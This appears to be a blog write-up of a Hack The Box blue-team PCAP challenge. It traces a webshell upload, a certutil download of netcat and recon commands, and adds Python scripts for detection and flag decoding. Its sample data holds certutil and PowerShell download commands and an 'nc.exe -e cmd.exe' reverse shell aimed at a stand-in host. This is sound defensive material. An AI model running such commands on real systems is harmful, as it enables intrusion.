Hack The Box: Chase

Nate
Dec 20, 2022


Challenge 1 of the Intro to Blue Team Track

Chase

Description: One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to take a clone of the disk. Can you take a look at the PCAP and see if anything is up?

First things first

Download the pcap file and open it in Wireshark.
We know this is a web server, so the attacker more than likely hit it over port 80.

Let's filter by HTTP and see what we can find.

We can see that the attacker utilized an upload form available on the site.

They then proceeded to upload what appears to be a webshell.

Digging deeper into this packet, we can see the command they used.

What is happening here?

  • certutil is a command-line program installed as part of Certificate Services. It lets you view CA configuration, verify certificates, and even encode and decode files.

However, it also has a built-in way to download files: the -urlcache -f flags.

-urlcache tells certutil to fetch the given URL into its URL cache, and -f forces the fetch even if the cache already holds an entry; adding -split writes the fetched content out to the path given.

So, if we run “certutil -urlcache -split -f http:///verybadfile.exe c:\users\public\verybadfile.exe”, the result is verybadfile.exe being written to C:\Users\Public on the target machine.

In this instance, the attacker is downloading netcat. Skipping down a little further, we can see netcat starts running on port 4444.

Back to the task

This is a good time to follow the TCP stream and see what we can find.

With this feature, Wireshark is simply attempting to reassemble any unencrypted plain text packets into a human readable format.

From this we immediately see that “whoami” and “ipconfig” were run on the server.

Scrolling down, notice that the attacker also attempted to download a file onto the server via PowerShell. However, they ran into some errors, so they switched back to using certutil.
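The commands the stream reveals (recon, a failed PowerShell download, the certutil fallback, netcat on 4444) are exactly the kind of thing a blue teamer wants to pull out of a capture automatically. The script below is an added example, not code from the write-up or from Hack The Box: it takes URL-decoded webshell request lines, extracts the command parameter and tags each command against a small rule set. The request lines are constructed for the example; the host 203.0.113.10, the /uploads/shell.php path and the "cmd" parameter name are assumptions, not values from the Chase capture.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of webshell request lines, modelled on the sequence the
# write-up describes. The host 203.0.113.10, the /uploads/shell.php path and
# the "cmd" parameter name are assumptions, not values from the capture.
SAMPLE_REQUESTS = [
    "GET /uploads/shell.php?cmd=whoami HTTP/1.1",
    "GET /uploads/shell.php?cmd=ipconfig HTTP/1.1",
    "GET /uploads/shell.php?cmd=powershell+-c+%22(New-Object+Net.WebClient)"
    ".DownloadFile('http://203.0.113.10/nc.exe','c:\\users\\public\\nc.exe')%22 HTTP/1.1",
    "GET /uploads/shell.php?cmd=certutil+-urlcache+-split+-f+http://203.0.113.10/nc.exe"
    "+c:\\users\\public\\nc.exe HTTP/1.1",
    "GET /uploads/shell.php?cmd=c:\\users\\public\\nc.exe+-e+cmd.exe+203.0.113.10+4444 HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

# Each rule names a behaviour worth flagging when it shows up in web-server traffic.
RULES = {
    "recon": re.compile(r"^(?:whoami|ipconfig|systeminfo|net\s+user)\b", re.I),
    "powershell download": re.compile(
        r"powershell.*(?:DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b)", re.I),
    "certutil download": re.compile(r"certutil(?:\.exe)?\b.*-urlcache\b.*\s-f\b", re.I),
    "netcat": re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s", re.I),
}


def extract_command(request_line: str):
    """Return the URL-decoded value of the webshell's cmd parameter, or None."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    values = parse_qs(query).get("cmd")  # parse_qs turns '+' into spaces and decodes %XX
    return values[0] if values else None


def classify(command: str):
    """Return the names of every rule the command matches."""
    return [name for name, pattern in RULES.items() if pattern.search(command)]


def triage(request_lines):
    """Walk the request lines and return (command, matched_rules) for each hit."""
    findings = []
    for line in request_lines:
        command = extract_command(line)
        if command is None:
            continue
        tags = classify(command)
        if tags:
            findings.append((command, tags))
    return findings


if __name__ == "__main__":
    for command, tags in triage(SAMPLE_REQUESTS):
        print(f"[{', '.join(tags)}] {command}")
```

Feeding it the decoded request lines from a real stream (for instance exported from Wireshark's packet list) gives a timeline of what the webshell was asked to do; the certutil rule in particular is worth turning into a detection, since a web server process spawning certutil with -urlcache is rarely legitimate.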

Let's take a look at the packet for this file:

If we highlight this packet and then select Analyze > HTTP Stream, we can view the contents of the file.

The file appears to just say “Hey there!”

The flag

The text file name is kind of odd, and HTB seems to love encoding things. Let's copy it over to CyberChef and see what happens: https://gchq.github.io/CyberChef/

After a few failed attempts with other options, I finally landed on Base32.

And there you have it, the flag has been found!
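The trial-and-error step in CyberChef can be scripted. The block below is an added example, not part of the write-up: it strips the file extension, restores any missing "=" padding (filenames usually lose it), and tries hex, base64 and base32, keeping only the decodings that come out as printable ASCII. The sample filename is constructed inside the code from a placeholder flag, so neither it nor the decoded string is the real Chase filename or flag.

```python
import base64
import binascii
import string

# Constructed stand-in for the oddly named text file: a placeholder flag,
# base32-encoded, padding stripped and case lowered the way a filename often
# arrives. Not the real challenge filename or flag.
SAMPLE_NAME = base64.b32encode(b"HTB{flag_goes_here}").decode().rstrip("=").lower() + ".txt"

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def _pad(s: str, block: int) -> str:
    """Restore '=' padding so the length is a multiple of the block size."""
    return s + "=" * (-len(s) % block)


def _is_text(data: bytes) -> bool:
    """True when the bytes decode to non-empty printable ASCII."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return bool(text) and all(ch in PRINTABLE for ch in text)


def decode_candidates(name: str) -> dict:
    """Try hex, base64 and base32 on a filename stem; keep decodings that read as text."""
    stem = name.rsplit(".", 1)[0]  # drop a trailing extension such as .txt
    attempts = {
        "hex": lambda s: bytes.fromhex(s),
        "base64": lambda s: base64.b64decode(_pad(s, 4), validate=True),
        # base32 is case-sensitive and padded to 8, so normalise before decoding
        "base32": lambda s: base64.b32decode(_pad(s.upper(), 8)),
    }
    results = {}
    for label, decode in attempts.items():
        try:
            data = decode(stem)
        except (ValueError, binascii.Error):
            continue  # not valid in this alphabet; move on to the next encoding
        if _is_text(data):
            results[label] = data.decode("ascii")
    return results


if __name__ == "__main__":
    print(SAMPLE_NAME, "->", decode_candidates(SAMPLE_NAME))
```

Because base32 uses a subset of the base64 alphabet, a base32 string will often decode "successfully" as base64 too; the printable-ASCII filter is what separates the real answer from binary noise, which is the same judgement you make by eye in CyberChef.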
